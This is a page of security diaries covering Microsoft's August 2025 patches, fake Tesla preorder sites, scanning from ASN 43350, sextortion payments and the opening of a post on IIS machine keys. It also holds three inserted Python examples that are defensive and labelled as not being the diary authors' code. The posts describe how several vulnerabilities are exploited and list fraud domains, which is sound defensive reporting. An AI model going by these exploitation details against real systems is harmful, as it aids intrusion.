Diaries

Published: 2025-08-12

Microsoft August 2025 Patch Tuesday

This month's Microsoft patch update addresses a total of 111 vulnerabilities, with 17 classified as critical. Among these, one vulnerability was disclosed prior to the patch release, marking it as a zero-day. While none of the vulnerabilities have been exploited in the wild, the critical ones pose significant risks, including remote code execution and elevation of privilege. Users are strongly advised to apply the updates promptly to safeguard their systems against potential threats.

Windows Kerberos Elevation of Privilege Vulnerability (CVE-2025-53779) is a disclosed zero-day vulnerability with a CVSS score of 7.2, rated as Moderate in severity. Although it has not been exploited in the wild, it poses a significant risk as it allows an attacker to gain domain administrator privileges. To exploit this vulnerability, an attacker would need high privileges, specifically access to certain attributes of the dMSA, such as msds-groupMSAMembership and msds-ManagedAccountPrecededByLink. These attributes enable the attacker to utilize the dMSA and specify a user that the dMSA can act on behalf of, potentially compromising the security of the domain.

Windows Graphics Component Remote Code Execution Vulnerability (CVE-2025-50165) is a critical vulnerability with a CVSS score of 9.8, which has not been exploited in the wild nor disclosed publicly as a zero-day. This vulnerability allows for remote code execution, posing a significant threat due to its ability to be exploited without any user interaction. The attack vector is network-based, and the vulnerability arises from an uninitialized function pointer being called when decoding a JPEG image, which can be embedded in Office and third-party documents or files. Successful exploitation could enable an attacker to execute arbitrary code remotely, highlighting the critical need for immediate attention and remediation to prevent potential exploitation.

GDI+ Remote Code Execution Vulnerability (CVE-2025-53766) is a critical vulnerability with a CVSS score of 9.8, which has not been exploited in the wild nor disclosed publicly as a zero-day. This vulnerability allows for remote code execution on web services parsing documents with specially crafted metafiles, without requiring any user interaction or privileges from the attacker. The attack vector is network-based, meaning an attacker could exploit this vulnerability by uploading such documents to web services, potentially leading to significant security breaches. The Preview Pane is not considered an attack vector for this vulnerability, and mitigation strategies should focus on securing web services against unauthorized document uploads.

Azure Portal Elevation of Privilege Vulnerability (CVE-2025-53792) is a critical vulnerability with a CVSS score of 9.1, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for elevation of privilege, potentially enabling unauthorized access to sensitive resources within the Azure Portal. Despite its critical severity, Microsoft has already fully mitigated this vulnerability, and no further action is required from users of the service. The CVE was issued to provide transparency regarding the vulnerability and its resolution, aligning with Microsoft's commitment to greater transparency in cloud service security.

Windows NTLM Elevation of Privilege Vulnerability (CVE-2025-53778) is a critical vulnerability that has not been exploited in the wild nor disclosed publicly as a zero-day. It carries a CVSS score of 8.8, indicating its high severity. The vulnerability allows an attacker to elevate their privileges to SYSTEM level, posing a significant risk to affected systems. Although currently not exploited, organizations are advised to implement mitigation strategies to prevent potential exploitation and ensure the security of their systems.

Microsoft Office Remote Code Execution Vulnerability (CVE-2025-53731) is a critical vulnerability with a CVSS score of 8.4, which has neither been exploited in the wild nor disclosed as a zero-day. This vulnerability allows for remote code execution, meaning an attacker can execute arbitrary code on the affected system, although the attack must be initiated locally. The Preview Pane in Microsoft Office serves as an attack vector, enabling the execution of malicious code when a user previews a compromised document. Despite the remote nature of the attacker's location, the exploit requires local execution, posing significant security risks if not addressed. Users are advised to apply necessary patches and updates to mitigate potential threats.

Microsoft Word Remote Code Execution Vulnerability (CVE-2025-53733) is a critical vulnerability with a CVSS score of 8.4, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for remote code execution, although the attack vector is local, meaning the attacker or victim must execute code from the local machine. The Preview Pane in Microsoft Word serves as an attack vector for this vulnerability, potentially enabling arbitrary code execution. Users are advised to apply all relevant updates for their software to mitigate this risk, as multiple update packages may be necessary to fully address the vulnerability.

Microsoft Office Remote Code Execution Vulnerability (CVE-2025-53740) is a critical vulnerability that has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. With a CVSS score of 8.4, this vulnerability allows for remote code execution, posing a significant risk to systems running Microsoft Office. Despite the attack vector being local, the term "Remote" refers to the attacker's location, indicating that the exploit can be initiated by executing code on the local machine. The Preview Pane in Microsoft Office is identified as a potential attack vector, which could be leveraged by attackers to execute arbitrary code. Users are advised to remain vigilant and apply necessary security measures to mitigate potential risks associated with this vulnerability.

Microsoft Word Remote Code Execution Vulnerability (CVE-2025-53784) is a critical vulnerability with a CVSS score of 8.4, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for remote code execution, meaning an attacker can execute arbitrary code on the affected system, although the attack must be initiated locally. The vulnerability is particularly concerning because it can be exploited through the Preview Pane, making it a potential vector for attacks. Despite its critical nature, no active exploitation has been reported, and mitigation strategies should focus on securing local execution environments and monitoring for suspicious activity.

Microsoft 365 Copilot BizChat Information Disclosure Vulnerability (CVE-2025-53787) is a critical vulnerability with a CVSS score of 8.2, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability could potentially lead to information disclosure, compromising sensitive data within the Microsoft 365 Copilot BizChat service. Despite its severity, Microsoft has already fully mitigated the issue, and there are no further actions required from users. The CVE was published to enhance transparency regarding cloud service vulnerabilities, ensuring users are informed about past security issues and their resolutions.

This summary of Microsoft's monthly updates highlights critical vulnerabilities, emphasizing the need for immediate attention to certain threats. Notably, the Windows Graphics Component Remote Code Execution Vulnerability (CVE-2025-50165) and GDI+ Remote Code Execution Vulnerability (CVE-2025-53766) both pose significant risks due to their potential for remote exploitation without user interaction. Users should prioritize patching these vulnerabilities to prevent unauthorized code execution. Additionally, the Windows Kerberos Elevation of Privilege Vulnerability (CVE-2025-53779), a disclosed zero-day, requires high privileges to exploit but could lead to domain administrator access, necessitating careful monitoring and mitigation. While some vulnerabilities, like the Azure Portal Elevation of Privilege, have been fully mitigated by Microsoft, others demand user action to ensure system security.


Description (product / vulnerability class), followed by one row per CVE with the columns:
CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
Azure OpenAI Elevation of Privilege Vulnerability
%%cve:2025-53767%% No No - - Critical 10.0 8.7
Azure Portal Elevation of Privilege Vulnerability
%%cve:2025-53792%% No No - - Critical 9.1 7.9
Azure Stack Hub Information Disclosure Vulnerability
%%cve:2025-53765%% No No - - Important 4.4 3.9
%%cve:2025-53793%% No No - - Critical 7.5 6.5
Azure Virtual Machines Information Disclosure Vulnerability
%%cve:2025-53781%% No No - - Critical 7.7 6.7
Azure Virtual Machines Spoofing Vulnerability
%%cve:2025-49707%% No No - - Critical 7.9 6.9
Desktop Windows Manager Elevation of Privilege Vulnerability
%%cve:2025-50153%% No No - - Important 7.8 6.8
Desktop Windows Manager Remote Code Execution Vulnerability
%%cve:2025-53152%% No No - - Important 7.8 6.8
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-50172%% No No - - Important 6.5 5.7
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-53135%% No No - - Important 7.0 6.1
DirectX Graphics Kernel Remote Code Execution Vulnerability
%%cve:2025-50176%% No No - - Critical 7.8 6.8
GDI+ Remote Code Execution Vulnerability
%%cve:2025-53766%% No No - - Critical 9.8 8.5
GitHub Copilot and Visual Studio Remote Code Execution Vulnerability
%%cve:2025-53773%% No No - - Important 7.8 6.8
Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
%%cve:2025-53149%% No No - - Important 7.8 6.8
Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability
%%cve:2025-53716%% No No - - Important 6.5 5.7
Microsoft 365 Copilot BizChat Information Disclosure Vulnerability
%%cve:2025-53774%% No No - - Critical 6.5 5.7
%%cve:2025-53787%% No No - - Critical 8.2 7.1
Microsoft Azure File Sync Elevation of Privilege Vulnerability
%%cve:2025-53729%% No No - - Important 7.8 6.8
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2025-53142%% No No - - Important 7.0 6.1
Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability
%%cve:2025-53728%% No No - - Important 6.5 5.7
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
%%cve:2025-49745%% No No - - Important 5.4 4.7
Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability
%%cve:2025-49755%% No No - - Low 4.3 3.8
%%cve:2025-49736%% No No - - Moderate 4.3 3.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-53741%% No No - - Important 7.8 6.8
%%cve:2025-53759%% No No - - Important 7.8 6.8
%%cve:2025-53735%% No No - - Important 7.8 6.8
%%cve:2025-53737%% No No - - Important 7.8 6.8
%%cve:2025-53739%% No No - - Important 7.8 6.8
Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability
%%cve:2025-53786%% No No - - Important 8.0 7.0
Microsoft Exchange Server Information Disclosure Vulnerability
%%cve:2025-33051%% No No - - Important 7.5 6.5
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2025-25006%% No No - - Important 5.3 4.6
%%cve:2025-25007%% No No - - Important 5.3 4.6
Microsoft Exchange Server Tampering Vulnerability
%%cve:2025-25005%% No No - - Important 6.5 5.7
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
%%cve:2025-50177%% No No - - Critical 8.1 7.1
%%cve:2025-53143%% No No - - Important 8.8 7.7
%%cve:2025-53144%% No No - - Important 8.8 7.7
%%cve:2025-53145%% No No - - Important 8.8 7.7
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-53731%% No No - - Critical 8.4 7.3
%%cve:2025-53732%% No No - - Important 7.8 6.8
%%cve:2025-53740%% No No - - Critical 8.4 7.3
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2025-53730%% No No - - Important 7.8 6.8
%%cve:2025-53734%% No No - - Important 7.8 6.8
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2025-53761%% No No - - Important 7.8 6.8
Microsoft SQL Server Elevation of Privilege Vulnerability
%%cve:2025-49758%% No No - - Important 8.8 7.7
%%cve:2025-53727%% No No - - Important 8.8 7.7
%%cve:2025-24999%% No No - - Important 8.8 7.7
%%cve:2025-49759%% No No - - Important 8.8 7.7
%%cve:2025-47954%% No No - - Important 8.8 7.7
Microsoft SharePoint Elevation of Privilege Vulnerability
%%cve:2025-53760%% No No - - Important 7.1 6.2
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2025-49712%% No No - - Important 8.8 7.7
Microsoft Teams Remote Code Execution Vulnerability
%%cve:2025-53783%% No No - - Important 7.5 6.5
Microsoft Windows File Explorer Spoofing Vulnerability
%%cve:2025-50154%% No No - - Important 7.5 6.5
Microsoft Word Information Disclosure Vulnerability
%%cve:2025-53736%% No No - - Important 6.8 5.9
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-53733%% No No - - Critical 8.4 7.3
%%cve:2025-53738%% No No - - Important 7.8 6.8
%%cve:2025-53784%% No No - - Critical 8.4 7.3
NT OS Kernel Information Disclosure Vulnerability
%%cve:2025-53136%% No No - - Important 5.5 4.8
Remote Access Point-to-Point Protocol (PPP) EAP-TLS Elevation of Privilege Vulnerability
%%cve:2025-50159%% No No - - Important 7.3 6.4
Remote Desktop Spoofing Vulnerability
%%cve:2025-50171%% No No - - Important 9.1 7.9
Web Deploy Remote Code Execution Vulnerability
%%cve:2025-53772%% No No - - Important 8.8 7.7
Win32k Elevation of Privilege Vulnerability
%%cve:2025-50161%% No No - - Important 7.3 6.4
%%cve:2025-50168%% No No - - Important 7.8 6.8
%%cve:2025-53132%% No No - - Important 8.0 7.0
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2025-49762%% No No - - Important 7.0 6.1
%%cve:2025-53134%% No No - - Important 7.0 6.1
%%cve:2025-53137%% No No - - Important 7.0 6.1
%%cve:2025-53141%% No No - - Important 7.8 6.8
%%cve:2025-53147%% No No - - Important 7.0 6.1
%%cve:2025-53154%% No No - - Important 7.8 6.8
%%cve:2025-53718%% No No - - Important 7.0 6.1
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2025-50170%% No No - - Important 7.8 6.8
Windows Connected Devices Platform Service Elevation of Privilege Vulnerability
%%cve:2025-53721%% No No - - Important 7.0 6.1
Windows Distributed Transaction Coordinator (MSDTC) Information Disclosure Vulnerability
%%cve:2025-50166%% No No - - Important 6.5 5.7
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-49743%% No No - - Important 6.7 5.8
Windows Graphics Component Remote Code Execution Vulnerability
%%cve:2025-50165%% No No - - Critical 9.8 8.5
Windows Hyper-V Denial of Service Vulnerability
%%cve:2025-49751%% No No - - Important 6.8 5.9
Windows Hyper-V Elevation of Privilege Vulnerability
%%cve:2025-50167%% No No - - Important 7.0 6.1
%%cve:2025-53155%% No No - - Important 7.8 6.8
%%cve:2025-53723%% No No - - Important 7.8 6.8
Windows Hyper-V Remote Code Execution Vulnerability
%%cve:2025-48807%% No No - - Critical 7.5 6.5
Windows Installer Elevation of Privilege Vulnerability
%%cve:2025-50173%% No No - - Important 7.8 6.8
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2025-53779%% Yes No - - Moderate 7.2 6.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-49761%% No No - - Important 7.8 6.8
%%cve:2025-53151%% No No - - Important 7.8 6.8
Windows Kernel Transaction Manager Elevation of Privilege Vulnerability
%%cve:2025-53140%% No No - - Important 7.0 6.1
Windows Media Remote Code Execution Vulnerability
%%cve:2025-53131%% No No - - Important 8.8 7.7
Windows NTFS Information Disclosure Vulnerability
%%cve:2025-50158%% No No - - Important 7.0 6.3
Windows NTLM Elevation of Privilege Vulnerability
%%cve:2025-53778%% No No - - Critical 8.8 7.7
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability
%%cve:2025-53133%% No No - - Important 7.8 6.8
Windows Push Notifications Apps Elevation of Privilege Vulnerability
%%cve:2025-53724%% No No - - Important 7.8 6.8
%%cve:2025-53725%% No No - - Important 7.8 6.8
%%cve:2025-53726%% No No - - Important 7.8 6.8
%%cve:2025-50155%% No No - - Important 7.8 6.8
Windows Remote Desktop Services Denial of Service Vulnerability
%%cve:2025-53722%% No No - - Important 7.5 6.5
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-50156%% No No - - Important 5.7 5.0
%%cve:2025-53138%% No No - - Important 5.7 5.0
%%cve:2025-53148%% No No - - Important 5.7 5.0
%%cve:2025-53153%% No No - - Important 5.7 5.0
%%cve:2025-53719%% No No - - Important 5.7 5.0
%%cve:2025-50157%% No No - - Important 5.7 5.0
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-49757%% No No - - Important 8.8 7.7
%%cve:2025-50160%% No No - - Important 8.0 7.0
%%cve:2025-50162%% No No - - Important 8.0 7.0
%%cve:2025-50163%% No No - - Important 8.8 7.7
%%cve:2025-50164%% No No - - Important 8.0 7.0
%%cve:2025-53720%% No No - - Important 8.0 7.0
Windows SMB Remote Code Execution Vulnerability
%%cve:2025-50169%% No No - - Important 7.5 6.5
Windows Security App Spoofing Vulnerability
%%cve:2025-53769%% No No - - Important 5.5 4.8
Windows StateRepository API Server file Elevation of Privilege Vulnerability
%%cve:2025-53789%% No No - - Important 7.8 6.8
Windows Storage Port Driver Information Disclosure Vulnerability
%%cve:2025-53156%% No No - - Important 5.5 4.8
Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability
%%cve:2025-53788%% No No - - Important 7.0 6.1
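The table above uses one heading line per product or bug class followed by one `%%cve:...%%` row per CVE. The following parser is an added example (not ISC's code and not part of the diary) that turns that row format into records, counts severities, and orders the rows the way a patch-planning discussion would: exploited first, then disclosed (zero-day) items, then by CVSS base score. The excerpt embedded in the block is a constructed subset of the rows above, so the counts it produces apply to the excerpt, not to the whole month.

```python
import re
from collections import Counter

# Constructed excerpt of the diary's table (same row format as the page);
# only a handful of rows so the demo stays short.
TABLE_EXCERPT = """\
Azure Portal Elevation of Privilege Vulnerability
%%cve:2025-53792%% No No - - Critical 9.1 7.9
GDI+ Remote Code Execution Vulnerability
%%cve:2025-53766%% No No - - Critical 9.8 8.5
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-53741%% No No - - Important 7.8 6.8
%%cve:2025-53759%% No No - - Important 7.8 6.8
Windows Graphics Component Remote Code Execution Vulnerability
%%cve:2025-50165%% No No - - Critical 9.8 8.5
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2025-53779%% Yes No - - Moderate 7.2 6.7
Windows NTLM Elevation of Privilege Vulnerability
%%cve:2025-53778%% No No - - Critical 8.8 7.7
"""

# One CVE row: id, Disclosed, Exploited, two exploitability columns,
# severity, CVSS base, CVSS temporal.
ROW_RE = re.compile(
    r"^%%cve:(?P<cve>\d{4}-\d+)%%\s+(?P<disclosed>Yes|No)\s+(?P<exploited>Yes|No)"
    r"\s+(?P<expl_old>\S+)\s+(?P<expl_cur>\S+)\s+(?P<severity>\w+)"
    r"\s+(?P<base>\d+\.\d)\s+(?P<temporal>\d+\.\d)$"
)


def parse_table(text):
    """Return one dict per CVE row, tagged with the heading it sits under.
    Any non-empty line that is not a CVE row is treated as a heading."""
    rows, description = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            description = line
            continue
        d = m.groupdict()
        rows.append({
            "description": description,
            "cve": "CVE-" + d["cve"],
            "disclosed": d["disclosed"] == "Yes",
            "exploited": d["exploited"] == "Yes",
            "severity": d["severity"],
            "cvss_base": float(d["base"]),
            "cvss_temporal": float(d["temporal"]),
        })
    return rows


def severity_counts(rows):
    """Number of rows per severity label (Critical, Important, ...)."""
    return Counter(r["severity"] for r in rows)


def triage(rows):
    """Exploited items first, then disclosed ones, then by descending base score."""
    return sorted(rows, key=lambda r: (not r["exploited"], not r["disclosed"], -r["cvss_base"]))


if __name__ == "__main__":
    rows = parse_table(TABLE_EXCERPT)
    print(dict(severity_counts(rows)))
    for r in triage(rows):
        print(f'{r["cve"]} {r["severity"]:9} {r["cvss_base"]:4} '
              f'disclosed={r["disclosed"]} {r["description"]}')
```

The heading-then-rows layout is the only structural assumption; running it over the complete table above yields the 17 Critical entries the diary reports.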

--
Renato Marinho
LinkedIn|Twitter


Published: 2025-08-10

Google Paid Ads for Fake Tesla Websites

In recent media events, Tesla has demoed progressively more sophisticated versions of its Optimus robots. The sales pitch is pretty simple: "Current AI" is fun, but what we really need is not something to create more funny kitten pictures. We need AI to load and empty dishwashers, fold laundry, and mow lawns. But the robot has not been for sale yet, and there is no firm release date.

screen shot of three different optimus models.

In the past, Tesla has accepted preorders for future products, asking for a deposit, which in some cases was even refundable. But aside from an April Fool's posting announcing such a presale, as far as I can tell, no presale has been offered by Tesla.

However, if you search for "Optimus Tesla preorder" and other similar terms, sites claiming to offer Optimus preorders will be advertised. 

Google Search results with fake Tesla site advertisements

These are sponsored listings. The official Tesla site (without the preorder option) shows below these fake links.

We have often seen sponsored listings like this used to advertise malware. But in this case, I suspect, the goal is simply to steal money from people willing to pay for preorders. The interesting twist is that the theft may remain unnoticed until the customer expects delivery, which may be months or years from now.

So far, I have seen these ads lead to three different websites:

  • offers-tesla.com (currently active)
  • exclusive-tesla.com (now offline)
  • prelaunch-tesla.com (now offline)

Other suspect domains:

  • private-tesla.com (unreachable)
  • corp-tesla.com (redirects to legitimate tesla.com site)
  • www-tesla.com (unreachable)
  • hyper-tesla.com (unreachable)
  • auth.cp-tesla.com (used for account setup by fake site)

The sites display a complete copy of a slightly older design of the Tesla.com website. As far as I can tell, the design does not include a login page. Standard phishing does not appear to be the goal here. Not having a login page may make it easier to hide that no orders are being placed. Customers will not be able to use the fake site to check their order status.

fake tesla site homepage

It asks for a $250 non-refundable deposit, which aligns with what Tesla asked for in prior preorder events.

preorder details

I tried to place an order with a test credit card number, and it was accepted, showing that the credit card was not charged (yet?). Next, I was directed to auth.cp-tesla.com to set up an account. I never received the e-mail confirmation, so I am not sure if my spam filters dropped it or if it is supposed to fail. The original Tesla site uses "auth.tesla.com" for authentication.

Setting up credit card processing for a fake site is likely too complicated, and I assume the site just collects the payment card data to later use the cards on other sites for fraudulent orders or just to resell the payment card data (are there still "Carder" forums? Have not looked at that in a while). So far, the fake sites have only been available for a few days before being shut down. I assume that Tesla monitors these sites and sends takedown requests as they find them.

Preorders are accepted not only for Optimus robots but also for other Tesla products. Interestingly, the data is sent to different sites, not just to the original site. One URL used is https://caribview.info/tesla/. There are a few open directory listings on offers-tesla.com (for example, /api and /js). File dates are from March and May 2025, which is likely around the time the Tesla site was copied. The fake site is hosted behind Cloudflare.
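All of the domains listed above share one pattern: the brand name with a hyphenated prefix under a registrable domain that is not tesla.com. The block below is an added example (not code from the diary or from Tesla) of the check a brand-protection or security team could run over domains harvested from ads, DNS logs or certificate transparency feeds. It goes a little beyond the page by also flagging single-edit typosquats. The allowlist and the sample host list are assumptions; the host list reuses the domains named above plus constructed entries (auth.tesla.com, www.tesla.com, example.org, tessla.com) to exercise each branch.

```python
BRAND = "tesla"
# Allowlist of registrable domains the brand legitimately uses (assumption for
# this demo; a real deployment maintains this per brand).
LEGITIMATE = {"tesla.com"}

# Constructed input: the domains named in the diary plus a few extra hosts.
OBSERVED_HOSTS = [
    "offers-tesla.com", "exclusive-tesla.com", "prelaunch-tesla.com",
    "private-tesla.com", "corp-tesla.com", "www-tesla.com", "hyper-tesla.com",
    "auth.cp-tesla.com", "auth.tesla.com", "www.tesla.com",
    "example.org", "tessla.com",
]


def registrable_domain(host):
    """Last two labels of a host name. This ignores the Public Suffix List
    (so 'shop.example.co.uk' would be split wrongly); it is enough for the
    .com/.org sample data used here."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host):
    """legitimate / brand-lookalike / typosquat / unrelated for one host."""
    reg = registrable_domain(host)
    if reg in LEGITIMATE:
        return "legitimate"
    label = reg.split(".")[0]
    if BRAND in label:
        return "brand-lookalike"   # brand embedded with a prefix/suffix, e.g. offers-tesla
    if edit_distance(label, BRAND) <= 1:
        return "typosquat"         # one edit away from the brand, e.g. tessla
    return "unrelated"


def suspicious_domains(hosts):
    """Registrable domains that need review, de-duplicated and sorted."""
    found = set()
    for h in hosts:
        if classify(h) in ("brand-lookalike", "typosquat"):
            found.add(registrable_domain(h))
    return sorted(found)


if __name__ == "__main__":
    for h in OBSERVED_HOSTS:
        print(f"{h:22} {classify(h)}")
    print("review:", suspicious_domains(OBSERVED_HOSTS))
```

Note that auth.cp-tesla.com collapses to cp-tesla.com, so the account-setup host from the diary is caught by the same rule as the storefront domains; a lookalike with a longer prefix or a different TLD would also be flagged, while legitimate subdomains of tesla.com are not.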

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Social Media Links: https://jbu.me


Published: 2025-08-07

Mass Internet Scanning from ASN 43350 [Guest Diary]

[This is a Guest Diary by Duncan Woosley, an ISC intern as part of the SANS.edu BACS program]

During the last three months I've had a DShield sensor online and collecting data from a deployment in AWS. This week I did some statistical analysis of the last three months of data and found a surprising result. Of all the locations that scanned and attacked the DShield sensor, one location was a clear winner in terms of volume of traffic, accounting for over 65% of the total traffic sent to the sensor. To my surprise, that location was Panama!

Total DShield Sensor Traffic per Location

The top 10 locations were close to in line with common expectations; however, the traffic from Panama was greater than the total traffic from all the remaining locations combined!

Digging into the source of this anomaly, I filtered for traffic by day and found that there were massive spikes on just a few days in the last three months that accounted for most of the DShield sensor's captured volume.

Largest Single Days by volume from April 7th to July 7th

Each spike was found to be caused by traffic from a single IP each day, but the IP responsible for each spike was different. However, six of the top ten most active IPs were all from a single /24 subnet! The subnet 141.98.80.0/24 was the cause of 59.4% of total logs collected by the sensor. Moreover, nine of the top 10 IPs were from the same internet service provider (ISP) named "NForce Entertainment B.V."

Autonomous System Number (ASN) 43350 accounted for 71.6% of the total sensor logs! This ASN belongs to NForce Entertainment, but NForce Entertainment appears to often lease out its IP space to other VPN and proxy providers, like the Panama-based Flyservers S.A. Flyservers is categorized as a "potentially very high fraud risk ISP" by Scamalytics and is likely the source of this activity.

Top ASNs by Total Traffic

Further research into this ISP found that the NForce Entertainment IP activity was often associated with phishing, malware, and scanning. As a Dutch ISP, they operate without strict regulatory oversight or pressure from their host nation to revoke threat actors’ use of their services.
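The analysis above (top source IPs, then the share of all logs attributable to one /24 and one ASN) is easy to reproduce over any sensor export. The block below is an added example, not the intern's own analysis code or a DShield tool: it parses a constructed, simplified "timestamp,source_ip,dest_port" export (not the real DShield log layout), counts records per source and per /24, and reports any subnet that exceeds a share threshold. The 141.98.80.0/24 addresses stand in for the subnet named in the diary; the other sources use documentation ranges, and the counts are invented. ASN lookup is deliberately left out because it needs an external dataset.

```python
import ipaddress
from collections import Counter

# Constructed sample export (timestamp,source_ip,dest_port); not real data.
SAMPLE_LOG = """\
2025-06-03T02:11:04Z,141.98.80.10,22
2025-06-03T02:11:05Z,141.98.80.10,3389
2025-06-03T02:11:06Z,141.98.80.10,445
2025-06-03T02:11:09Z,141.98.80.11,22
2025-06-03T02:11:10Z,141.98.80.11,80
2025-06-03T02:12:01Z,141.98.80.12,443
2025-06-03T02:12:02Z,141.98.80.12,8080
2025-06-03T02:13:15Z,141.98.80.13,22
2025-06-03T02:13:16Z,141.98.80.14,22
2025-06-04T11:02:41Z,198.51.100.7,22
2025-06-04T11:03:03Z,203.0.113.9,3389
2025-06-04T11:05:19Z,192.0.2.33,445
2025-06-05T08:40:00Z,198.51.100.8,23
2025-06-05T09:12:37Z,203.0.113.10,22
"""


def parse_log(text):
    """Return (timestamp, source IP object, destination port) per non-empty line."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, port = line.split(",")
        records.append((ts, ipaddress.ip_address(src), int(port)))
    return records


def count_by_source(records):
    """Records per source address."""
    return Counter(str(src) for _, src, _ in records)


def count_by_subnet(records, prefix=24):
    """Records per /prefix network; strict=False masks off the host bits."""
    return Counter(
        str(ipaddress.ip_network(f"{src}/{prefix}", strict=False))
        for _, src, _ in records
    )


def shares(counter):
    """Fraction of the total attributable to each key."""
    total = sum(counter.values())
    return {k: v / total for k, v in counter.items()}


def noisy_subnets(records, threshold=0.5, prefix=24):
    """Subnets responsible for at least `threshold` of all records."""
    return [net for net, s in shares(count_by_subnet(records, prefix)).items()
            if s >= threshold]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("top sources:", count_by_source(recs).most_common(3))
    for net, share in sorted(shares(count_by_subnet(recs)).items(), key=lambda kv: -kv[1]):
        print(f"{net:18} {share:6.1%}")
    print("subnets over 50% of traffic:", noisy_subnets(recs))
```

Changing `prefix` to 16 or 8 shows whether the concentration is a single /24 or a wider allocation, which is the question that led the diary from individual IPs to the subnet and then to the ASN.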

Recommendations

Unfortunately, the solution for network defenders isn't as simple as blocking all traffic from NForce Entertainment. If your organization is in a position where no NForce Entertainment traffic is required for business, this may be an option, but the majority of organizations don’t allow sweeping IP blocking. Instead, I would recommend blocking only sensitive services and HTTP(S) endpoints that allow for logins. The following actions are recommended.

•    Flag traffic from NForce Entertainment, and in particular from ASN 43350.
•    Block access to Remote Desktop Protocol from the internet.
•    Monitor for SSH activity from ASN 43350 and configure SSH to use key-based authentication.
•    Implement a Web Application Firewall (WAF) in front of all web applications and monitor activity from any source for suspicious queries.
•    Create a WAF alert threshold for high traffic volume originating from a single source.

[1] https://www.arin.net/resources/guide/asn/
[2] https://scamalytics.com
[3] https://owasp.org/www-community/Web_Application_Firewall
[4] https://www.sans.edu/cyber-security-programs/bachelors-degree/

NOTE: ChatGPT was used for spelling and grammar checks only
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2025-08-06

Do sextortion scams still work in 2025?

Sextortion e-mails have been with us for quite a while, and these days, most security professionals tend to think of them more as “e-mail background noise” than as a serious threat. Given that their existence is reasonably well-known even among the general public, this viewpoint would seem to be justified… But are sextortion messages really irrelevant as a threat at this point, and can we therefore safely omit this topic from security awareness trainings?

I thought that it might be worthwhile to try and find out, so I decided to go over sextortion messages that were delivered to my various spam traps and e-mail accounts during the past 12 months and see whether the cryptocurrency addresses mentioned in them actually received any payments.

In total, I collected 21 different e-mail messages that asked for payment to be sent to 15 distinct cryptocurrency addresses (13 of these were Bitcoin addresses and 2 were Litecoin addresses). For completeness’s sake, it should be noted that while most of the addresses were only seen in e-mails delivered during a single day, this wasn’t always the case, as one of the addresses was observed in messages sent out 32 days apart.

Admittedly, 15 addresses represent a rather small sample size, but it proved to be more than sufficient to give us the desired information about the continued effectiveness of sextortion…

In the sextortion messages, their senders were asking for payments of between $750 and $1,550, with average and median requested amounts being $1,203 and $1,250, respectively. While 6 of the 15 identified addresses didn’t receive any payments at all, the remaining 9 did – in total, incoming transactions to these addresses amounted to between $945 and $10,715, with average and median total amounts received being $1,836 and $1,028, respectively.

Although not all incoming payments to the addresses were necessarily connected solely to sextortion, it seems highly probable that at least most of them were… Which suggests that even in 2025, sextortion is still a relevant threat, and a topic that warrants attention in security awareness programs.

-----------
Jan Kopriva
LinkedIn
Nettles Consulting


Published: 2025-08-05

Stealing Machine Keys for fun and profit (or riding the SharePoint wave)

About 10 days ago, exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused; we wrote about that here and here.

The original SharePoint vulnerability is a deserialization vulnerability that allowed an attacker to execute arbitrary commands. While these could be literally anything, the majority of exploits that we analyzed resulted in attackers dropping an ASPX file that simply revealed the IIS Machine Key to them. This prompted me to dive a bit deeper into how this can be abused.

What are IIS Machine Keys?

